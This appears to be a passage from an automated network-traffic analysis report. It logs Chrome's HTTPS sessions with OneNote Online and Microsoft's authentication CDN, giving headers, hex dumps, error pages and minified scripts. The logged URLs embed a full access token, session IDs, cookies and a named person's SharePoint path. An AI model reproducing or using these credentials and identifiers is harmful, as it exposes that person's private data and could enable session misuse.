                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:33 UTC479OUTData Raw: 7b 22 64 22 3a 7b 22 61 22 3a 22 4f 6e 65 4e 6f 74 65 22 2c 22 62 22 3a 22 66 72 2d 46 52 22 2c 22 63 22 3a 22 45 64 69 74 22 2c 22 64 22 3a 22 45 44 49 54 22 2c 22 65 22 3a 22 31 36 2e 30 2e 31 35 37 30 37 2e 34 31 30 31 35 22 2c 22 66 22 3a 22 43 68 72 6f 6d 65 22 2c 22 67 22 3a 22 66 72 2d 46 52 22 2c 22 68 22 3a 22 31 30 34 22 2c 22 69 22 3a 22 31 30 34 2e 30 2e 30 22 2c 22 6a 22 3a 22 31 36 2e 30 2e 31 35 37 30 37 2e 34 31 30 31 35 22 2c 22 6b 22 3a 22 47 45 55 32 22 2c 22 6c 22 3a 22 66 72 2d 46 52 22 2c 22 6d 22 3a 22 5c 22 4a 75 56 34 47 6f 53 7a 45 30 33 77 70 77 36 38 55 54 33 37 4e 37 65 4c 2f 38 45 42 6b 49 42 43 63 46 48 59 6b 75 4d 58 50 56 30 3d 5c 22 22 2c 22 6e 22 3a 22 53 68 61 72 65 50 6f 69 6e 74 20 4f 6e 6c 69 6e 65 22 2c 22 6f 22 3a
                                                Data Ascii: {"d":{"a":"OneNote","b":"fr-FR","c":"Edit","d":"EDIT","e":"16.0.15707.41015","f":"Chrome","g":"fr-FR","h":"104","i":"104.0.0","j":"16.0.15707.41015","k":"GEU2","l":"fr-FR","m":"\"JuV4GoSzE03wpw68UT37N7eL/8EBkIBCcFHYkuMXPV0=\"","n":"SharePoint Online","o":
                                                2022-10-03 13:38:33 UTC490INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 12b11b5c-4ebe-4684-9176-1dcb6ad3b919
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM4PEPF0000B708
                                                X-OfficeVersion: 16.0.15726.41002
                                                X-OfficeCluster: GEU8
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM4PEPF0000B708
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_excelslice,afd_visioslice_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 1051ACDD036F438590BB096ACB3E5ED2 Ref B: AMS231032606047 Ref C: 2022-10-03T13:38:33Z
                                                Date: Mon, 03 Oct 2022 13:38:33 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                26192.168.2.34981613.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:34 UTC491OUTGET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:34 UTC494INHTTP/1.1 500 Internal Server Error
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: dab45e8d-5a33-4169-9d20-f528be241160
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000094C4
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000094C4
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 673752225FE04E97956AD0C9CFF6DC39 Ref B: AMS231032602045 Ref C: 2022-10-03T13:38:34Z
                                                Date: Mon, 03 Oct 2022 13:38:34 GMT
                                                Connection: close
                                                2022-10-03 13:38:34 UTC495INData Raw: 34 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 35 30 30 20
                                                Data Ascii: 4b8<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>500
                                                2022-10-03 13:38:34 UTC496INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                27192.168.2.34982313.107.246.60443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:35 UTC496OUTGET /me?partner=OneNoteOnline&version=10.22108.2&market=FR-FR&wrapperId=suiteshell HTTP/1.1
                                                Host: amcdn.msftauth.net
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                Origin: https://euc-onenote.officeapps.live.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://euc-onenote.officeapps.live.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:35 UTC500INHTTP/1.1 200 OK
                                                Cache-Control: public, no-transform, max-age=43200
                                                Content-Length: 30205
                                                Content-Type: application/javascript
                                                Expires: Tue, 04 Oct 2022 01:38:35 GMT
                                                X-Cache: CONFIG_NOCACHE
                                                X-Content-Type-Options: nosniff
                                                Access-Control-Allow-Origin: *
                                                X-UA-Compatible: IE=edge
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                X-Azure-Ref-OriginShield: 02+U6YwAAAAAxQMbSjp35RrCC97wCjZSSQU1TMDRFREdFMTkxNQBlYWM1ZjQ5Zi1lMDJkLTRmNDEtYjBhNi0yZDUwZjlmY2Y4NGE=
                                                X-Azure-Ref: 02+U6YwAAAAAmwgQ0GOegSJY/OlXXrYqjQlJVMzBFREdFMDcyMAA5ZmU2YzNmMS0xNzE4LTRhOTMtOTI1NS02M2NkM2Y4Y2E1YWI=
                                                Date: Mon, 03 Oct 2022 13:38:34 GMT
                                                Connection: close
                                                2022-10-03 13:38:35 UTC501INData Raw: 77 69 6e 64 6f 77 2e 4d 53 41 3d 77 69 6e 64 6f 77 2e 4d 53 41 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 3d 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 2e 43 6f 6e 66 69 67 3d 7b 22 76 65 72 22 3a 22 31 30 2e 32 32 31 30 38 2e 32 22 2c 22 6d 6b 74 22 3a 22 66 72 2d 46 52 22 2c 22 70 74 6e 22 3a 22 6f 6e 65 6e 6f 74 65 6f 6e 6c 69 6e 65 22 2c 22 67 66 78 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 22 2c 22 64 62 67 22 3a 66 61 6c 73 65 2c 22 61 61 64 22 3a 74 72 75 65 2c 22 69 6e 74 22 3a 66 61 6c 73 65 2c 22 70 78 79 22 3a 74 72 75 65 2c 22 6d 73 54 78 74 22 3a 66 61 6c 73 65 2c 22 72 77 64
                                                Data Ascii: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.22108.2","mkt":"fr-FR","ptn":"onenoteonline","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd
                                                2022-10-03 13:38:35 UTC504INData Raw: 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2b 2b 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 6e 3d 65 7d 76 61 72 20 70 3d 77 69 6e 64 6f 77 2c 6d 3d 70 2e 4d 65 43 6f 6e 74 72 6f 6c 3d 70 2e 4d 65 43 6f 6e 74 72 6f 6c 7c 7c 7b 7d 2c 76 3d 44 61 74 65 2e 6e 6f 77 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 61 74 65 2e 6e 6f 77 28 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 2b 6e 65 77 20 44 61 74 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 2e 70 65
                                                Data Ascii: ement:function(){n++}}}function l(){return n}function d(e){n=e}var p=window,m=p.MeControl=p.MeControl||{},v=Date.now?function(){return Date.now()}:function(){return+new Date},g=function(){return p.performance.now()},h=function(){return p.performance&&p.pe
                                                2022-10-03 13:38:35 UTC512INData Raw: 5f 65 28 65 2c 6e 2c 74 29 7b 74 68 69 73 2e 6f 6e 46 75 6c 66 69 6c 6c 65 64 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 6e 75 6c 6c 2c 74 68 69 73 2e 6f 6e 52 65 6a 65 63 74 65 64 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 6e 3a 6e 75 6c 6c 2c 74 68 69 73 2e 70 72 6f 6d 69 73 65 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 2c 6e 29 7b 76 61 72 20 74 3d 21 31 3b 74 72 79 7b 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 7c 7c 28 74 3d 21 30 2c 44 65 28 6e 2c 65 29 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 7c 7c 28 74 3d 21 30 2c 55 65 28 6e 2c 65 29 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 74 29 72 65 74 75 72 6e 3b 74 3d 21 30 2c 55 65 28 6e 2c 65 29 7d 7d 4d 65 2e 70 72 6f 74 6f 74 79 70
                                                Data Ascii: _e(e,n,t){this.onFulfilled="function"==typeof e?e:null,this.onRejected="function"==typeof n?n:null,this.promise=t}function Le(e,n){var t=!1;try{e(function(e){t||(t=!0,De(n,e))},function(e){t||(t=!0,Ue(n,e))})}catch(e){if(t)return;t=!0,Ue(n,e)}}Me.prototyp
                                                2022-10-03 13:38:35 UTC516INData Raw: 6e 2e 6d 6b 74 2b 22 2f 22 2b 65 2b 28 6e 2e 64 62 67 3f 22 22 3a 22 2e 6d 69 6e 22 29 2b 22 2e 6a 73 22 7d 28 73 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 61 73 79 6e 63 3d 21 30 2c 74 2e 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 74 2e 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2c 74 2e 73 72 63 3d 63 3b 76 61 72 20 72 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 75 28 29 2c 6e 3d 22 42 75 6e 64 6c 65 20 64 6f 77 6e 6c 6f 61 64 20 74 69 6d 65 64 20 6f 75 74 22 3b 6e 6e 28 73 2c 65 2c
                                                Data Ascii: n.mkt+"/"+e+(n.dbg?"":".min")+".js"}(s),n=document.getElementsByTagName("head")[0],t=document.createElement("script");t.async=!0,t.type="text/javascript",t.charset="UTF-8",t.src=c;var r=setTimeout(function(){var e=u(),n="Bundle download timed out";nn(s,e,
                                                2022-10-03 13:38:35 UTC524INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 6e 69 74 69 61 6c 20 43 6f 6c 6c 61 70 73 65 64 22 3a 6e 2e 6f 6e 45 76 65 6e 74 4c 6f 67 28 22 48 65 61 64 65 72 52 65 61 64 79 22 2c 7b 64 75 72 61 74 69 6f 6e 3a 30 7d 29 2c 6e 2e 6f 6e 45 76 65 6e 74 4c 6f 67 28 22 44 72 6f 70 64 6f 77 6e 52 65 61 64 79 22 2c 7b 64 75 72 61 74 69 6f 6e 3a 30 7d 29 7d 7d 63 61 74 63 68 28 65 29 7b 7d 7d 29 2c 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 6e 28 65 29 7b 69 66 28 21 65 7c 7c 21 65 2e 69 64 70 29 72 65 74 75 72 6e 21 31 3b 73 77 69 74 63 68 28 65 2e 69 64 70 29 7b 63 61 73 65 22 61 61 64 22 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 6e 75 6c 6c 21 3d 65 2e 6d 65 6d 62 65 72 4e 61 6d 65 26 26 30 3c 65 2e 6d 65 6d 62 65 72 4e
                                                Data Ascii: );break;case"Initial Collapsed":n.onEventLog("HeaderReady",{duration:0}),n.onEventLog("DropdownReady",{duration:0})}}catch(e){}}),e}}function bn(e){if(!e||!e.idp)return!1;switch(e.idp){case"aad":return function(e){return e&&null!=e.memberName&&0<e.memberN


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                28192.168.2.34982413.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:35 UTC497OUTGET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:35 UTC534INHTTP/1.1 500 Internal Server Error
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 32e7a21a-195b-4dd3-a0a9-41308058cfce
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000094C5
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000094C5
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_excelslice_control,afd_onenoteslice_control,afd_wacinfra4,afd_wacinfra5
